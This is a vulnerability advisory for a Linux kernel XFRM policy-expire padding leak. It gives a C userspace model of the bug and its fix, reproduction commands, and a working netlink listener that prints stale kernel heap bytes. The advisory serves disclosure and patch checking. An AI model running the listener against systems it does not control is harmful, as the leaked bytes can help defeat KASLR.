Linux Kernel Trailing Padding Memory Leak Vulnerability in XFRM Policy Expiration Handling

Vulnerability

A vulnerability in the Linux kernel's handling of XFRM (IPsec) policy expiration discloses uninitialized kernel memory to userspace. The issue is in 'build_polexpire()' in net/xfrm/xfrm_user.c, which fills in a 'struct xfrm_user_polexpire' (a 'struct xfrm_userpolicy_info' followed by a single '__u8 hard' flag) inside a freshly allocated netlink message but does not clear the alignment padding that follows 'hard'. The message buffer comes from the kernel heap and is not zeroed on allocation, so those padding bytes still hold whatever the memory contained before, and they are sent unchanged to userspace in the XFRM_MSG_POLEXPIRE notification that is multicast to XFRMNLGRP_EXPIRE listeners. This is an information leak (stale heap contents reach userspace), not a resource leak. Several versions of the Linux kernel are affected.
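The following is an added userspace model of the bug, not code from the page or from the kernel. It uses the real UAPI layout of 'struct xfrm_user_polexpire' from <linux/xfrm.h>, stands in for the kernel's unzeroed netlink allocation with a malloc()ed buffer pre-filled with a marker byte (STALE is an assumed value chosen for the demonstration), and contrasts an unpatched builder that leaves the padding alone with a hardened one that zeroes everything after 'hard'. The function names 'build_polexpire_unpatched' and 'build_polexpire_patched' are hypothetical; the exact form of the upstream fix is not reproduced.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <linux/xfrm.h>   /* real UAPI layout of struct xfrm_user_polexpire */

#define STALE 0xA5        /* assumption: marker standing in for old heap contents */

/* Alignment padding between the end of `hard` and the end of the struct.
 * The struct contains __u64 lifetime counters, so it is 8-byte aligned and a
 * trailing one-byte field leaves up to 7 bytes of padding on 64-bit builds. */
static size_t polexpire_trailing_padding(void)
{
    return sizeof(struct xfrm_user_polexpire)
           - (offsetof(struct xfrm_user_polexpire, hard) + 1);
}

/* Model of the unpatched build_polexpire(): copy the policy info, set the
 * flag, and touch no other byte of the freshly allocated message. */
static void build_polexpire_unpatched(struct xfrm_user_polexpire *upe,
                                      const struct xfrm_userpolicy_info *pol,
                                      int hard)
{
    memcpy(&upe->pol, pol, sizeof upe->pol);
    upe->hard = !!hard;
}

/* Hardened model: additionally zero everything after `hard`. The kernel's
 * memset_after() helper expresses exactly this operation. */
static void build_polexpire_patched(struct xfrm_user_polexpire *upe,
                                    const struct xfrm_userpolicy_info *pol,
                                    int hard)
{
    memcpy(&upe->pol, pol, sizeof upe->pol);
    upe->hard = !!hard;
    memset((unsigned char *)upe + offsetof(struct xfrm_user_polexpire, hard) + 1,
           0, polexpire_trailing_padding());
}

/* Stand-in for nlmsg_new()+nlmsg_put(): a heap buffer that still holds STALE,
 * filled by one of the two builders. Returns how many STALE bytes survive in
 * the trailing padding, i.e. how many bytes would reach userspace uncleared. */
static size_t stale_bytes_after_build(int patched)
{
    struct xfrm_user_polexpire *upe = malloc(sizeof *upe);
    struct xfrm_userpolicy_info pol;
    const unsigned char *pad;
    size_t i, leaked = 0;

    if (!upe)
        return (size_t)-1;
    memset(upe, STALE, sizeof *upe);          /* "previous occupant" of the heap */
    memset(&pol, 0, sizeof pol);              /* constructed policy info */
    pol.index = 7;

    if (patched)
        build_polexpire_patched(upe, &pol, 0);
    else
        build_polexpire_unpatched(upe, &pol, 0);

    pad = (const unsigned char *)upe + offsetof(struct xfrm_user_polexpire, hard) + 1;
    for (i = 0; i < polexpire_trailing_padding(); i++)
        if (pad[i] == STALE)
            leaked++;
    free(upe);
    return leaked;
}

int main(void)
{
    printf("trailing padding bytes in struct xfrm_user_polexpire: %zu\n",
           polexpire_trailing_padding());
    printf("stale bytes left by unpatched builder: %zu\n", stale_bytes_after_build(0));
    printf("stale bytes left by patched builder:   %zu\n", stale_bytes_after_build(1));
    return 0;
}
```

Build with the normal system compiler (the struct comes from the kernel UAPI headers, so no kernel build tree is needed). The unpatched variant leaves every padding byte as the allocator handed it over; the patched variant zeroes them, which is why a patched kernel's notifications always carry zeros after 'hard'.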

Impact

A local process that receives XFRMNLGRP_EXPIRE notifications can read stale kernel heap bytes from every policy-expire message. Only the padding after the 'hard' flag leaks (at most 7 bytes per message on 64-bit builds, fewer on 32-bit), so the practical impact is disclosure of fragments of whatever previously occupied the allocation, such as kernel pointers that help defeat KASLR or pieces of other sensitive data. The bug does not by itself corrupt memory or grant code execution.

Reproduction

To reproduce, run a kernel whose 'build_polexpire()' lacks the fix and trigger a policy-expire notification: add an XFRM policy with a short lifetime, for example 'ip xfrm policy add src 10.0.0.1/32 dst 10.0.0.2/32 dir out limit time-soft 1' (an example command; the selector is arbitrary because the policy only has to expire, not match traffic). When the soft limit elapses the kernel multicasts an XFRM_MSG_POLEXPIRE message to XFRMNLGRP_EXPIRE listeners, and its payload is a 'struct xfrm_user_polexpire'. A process that has opened a NETLINK_XFRM socket and bound it to that multicast group receives the message; on an unpatched kernel the bytes after 'hard' are stale heap contents that vary from run to run, while a patched kernel sends zeros there. Binding to the multicast group requires CAP_NET_ADMIN in the socket's network namespace, so the leak is reachable by root, or by an otherwise unprivileged user inside a user namespace that owns its own network namespace where unprivileged user namespaces are enabled.
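The listener below is an added example, not code from the page or from the kernel project. It joins XFRMNLGRP_EXPIRE on a NETLINK_XFRM socket and, for each XFRM_MSG_POLEXPIRE message, prints the bytes after 'hard' and flags any that are non-zero. The parsing is kept in a function of its own so it can be exercised offline against a constructed sample message ('make_sample_polexpire' builds that sample; it is not a real capture). The helper names are hypothetical, and the live loop in main() needs CAP_NET_ADMIN in its network namespace to bind the group.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/xfrm.h>

/* Offset and length of the alignment padding after `hard` in the payload. */
#define PAD_OFF (offsetof(struct xfrm_user_polexpire, hard) + 1)
#define PAD_LEN (sizeof(struct xfrm_user_polexpire) - PAD_OFF)

/* Copy the trailing padding of one XFRM_MSG_POLEXPIRE message into out.
 * Returns the number of bytes copied, 0 for other message types or a payload
 * too short to hold the whole struct (never reads past nlmsg_len), and -1 when
 * the netlink header itself does not fit in the `avail` bytes. */
static int polexpire_padding(const struct nlmsghdr *nlh, size_t avail,
                             unsigned char *out, size_t outlen)
{
    size_t n;

    if (avail < sizeof *nlh || !NLMSG_OK(nlh, (int)avail))
        return -1;
    if (nlh->nlmsg_type != XFRM_MSG_POLEXPIRE)
        return 0;
    if (nlh->nlmsg_len < NLMSG_LENGTH(sizeof(struct xfrm_user_polexpire)))
        return 0;
    n = PAD_LEN < outlen ? PAD_LEN : outlen;
    memcpy(out, (const unsigned char *)NLMSG_DATA(nlh) + PAD_OFF, n);
    return (int)n;
}

/* Number of non-zero bytes in pad[0..n): a patched kernel always sends zeros. */
static int nonzero_count(const unsigned char *pad, size_t n)
{
    int c = 0;
    for (size_t i = 0; i < n; i++)
        if (pad[i])
            c++;
    return c;
}

/* Constructed sample (not a real capture): one POLEXPIRE message whose trailing
 * padding holds `fill`, the way an unpatched kernel might leave it. Returns
 * nlmsg_len, or 0 if buf is too small. */
static size_t make_sample_polexpire(unsigned char *buf, size_t buflen,
                                    unsigned char fill)
{
    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    struct xfrm_user_polexpire *upe;

    if (buflen < NLMSG_SPACE(sizeof *upe))
        return 0;
    memset(buf, 0, NLMSG_SPACE(sizeof *upe));
    nlh->nlmsg_len = NLMSG_LENGTH(sizeof *upe);
    nlh->nlmsg_type = XFRM_MSG_POLEXPIRE;
    upe = NLMSG_DATA(nlh);
    upe->pol.index = 7;
    upe->hard = 0;
    memset((unsigned char *)upe + PAD_OFF, fill, PAD_LEN);
    return nlh->nlmsg_len;
}

/* Offline check: how many non-zero padding bytes a sample filled with `fill`
 * shows through the same parser the live loop uses. -1 on error. */
static int check_sample(unsigned char fill)
{
    unsigned char msg[512], pad[64];
    size_t len = make_sample_polexpire(msg, sizeof msg, fill);
    int n;

    if (!len)
        return -1;
    n = polexpire_padding((const struct nlmsghdr *)msg, len, pad, sizeof pad);
    return n < 0 ? -1 : nonzero_count(pad, (size_t)n);
}

int main(void)
{
    struct sockaddr_nl sa;
    unsigned char buf[8192], pad[64];
    int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);

    if (fd < 0) {
        perror("socket(NETLINK_XFRM)");
        return 1;
    }
    memset(&sa, 0, sizeof sa);
    sa.nl_family = AF_NETLINK;
    sa.nl_groups = 1u << (XFRMNLGRP_EXPIRE - 1);   /* legacy 32-group bitmask */
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        perror("bind XFRMNLGRP_EXPIRE (needs CAP_NET_ADMIN in this netns)");
        return 1;
    }
    for (;;) {
        ssize_t r = recv(fd, buf, sizeof buf, 0);
        struct nlmsghdr *nlh;
        int avail;

        if (r < 0) {
            if (errno == EINTR)
                continue;
            perror("recv");
            return 1;
        }
        avail = (int)r;
        for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, avail);
             nlh = NLMSG_NEXT(nlh, avail)) {
            int n = polexpire_padding(nlh, (size_t)avail, pad, sizeof pad), i;

            if (n <= 0)
                continue;
            printf("XFRM_MSG_POLEXPIRE: %d padding bytes after hard:", n);
            for (i = 0; i < n; i++)
                printf(" %02x", pad[i]);
            printf("  %s\n", nonzero_count(pad, (size_t)n)
                             ? "<- non-zero: stale kernel memory" : "(all zero)");
        }
    }
}
```

Start the listener as root (or inside 'unshare -Urn', which gives CAP_NET_ADMIN over a private network namespace), then add a policy with a one-second soft limit in the same namespace. Non-zero bytes in the printed padding are the leak; a patched kernel prints all zeros every time. The parser checks nlmsg_len before reading the struct so a short or foreign message cannot make the tool read past the received data.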

Remediation

Upgrade to a kernel that contains the fix, commit '71a98248c63c535eaa4d4c22f099b68d902006d0' in the Linux kernel stable tree; the fix clears the trailing padding in 'build_polexpire()' before the message is sent, so the bytes after 'hard' that reach userspace are always zero. Distribution kernels may carry the same change under a different commit id, so check the vendor changelog for the 'build_polexpire()' fix rather than the hash alone. There is no configuration switch that suppresses these notifications; short of patching, the only mitigation is to limit who can join XFRMNLGRP_EXPIRE by restricting CAP_NET_ADMIN and unprivileged user namespaces.

Added: Apr 24, 2026, 3:44 PM
Updated: Apr 24, 2026, 3:44 PM

Vulnerability Rating

Custom Algorithm
spread: 9.0
impact: 0.6
exploitability: 4.3
remediation: 7.7
relevance: 6.6
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.